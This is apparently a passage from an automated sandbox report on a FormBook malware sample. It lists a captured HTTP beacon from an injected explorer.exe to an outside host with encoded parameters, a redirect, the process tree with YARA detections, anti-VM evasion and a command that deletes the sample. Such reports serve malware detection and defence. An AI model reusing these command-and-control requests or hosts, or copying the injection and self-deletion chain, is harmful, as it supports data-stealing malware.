                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    9192.168.2.349748184.168.131.24180C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:49:47.313764095 CET5467OUTGET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1
                                                                    Host: www.100feetpics.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:49:47.551704884 CET5467INHTTP/1.1 301 Moved Permanently
                                                                    Server: nginx/1.16.1
                                                                    Date: Wed, 13 Jan 2021 19:49:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Location: https://100-feet-pics.mykreezalid.com/8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Start time:20:47:25
                                                                    Start date:13/01/2021
                                                                    Path:C:\Users\user\Desktop\YvGnm93rap.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\YvGnm93rap.exe'
                                                                    Imagebase:0xb30000
                                                                    File size:654336 bytes
                                                                    MD5 hash:16E1A5D26C0698AC48D63661264E0BA1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:20:47:29
                                                                    Start date:13/01/2021
                                                                    Path:C:\Users\user\Desktop\YvGnm93rap.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:{path}
                                                                    Imagebase:0x460000
                                                                    File size:654336 bytes
                                                                    MD5 hash:16E1A5D26C0698AC48D63661264E0BA1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:20:47:31
                                                                    Start date:13/01/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:
                                                                    Imagebase:0x7ff714890000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:20:47:44
                                                                    Start date:13/01/2021
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                    Imagebase:0x2a0000
                                                                    File size:59904 bytes
                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:20:47:49
                                                                    Start date:13/01/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\Desktop\YvGnm93rap.exe'
                                                                    Imagebase:0xd60000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:20:47:49
                                                                    Start date:13/01/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6b2800000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >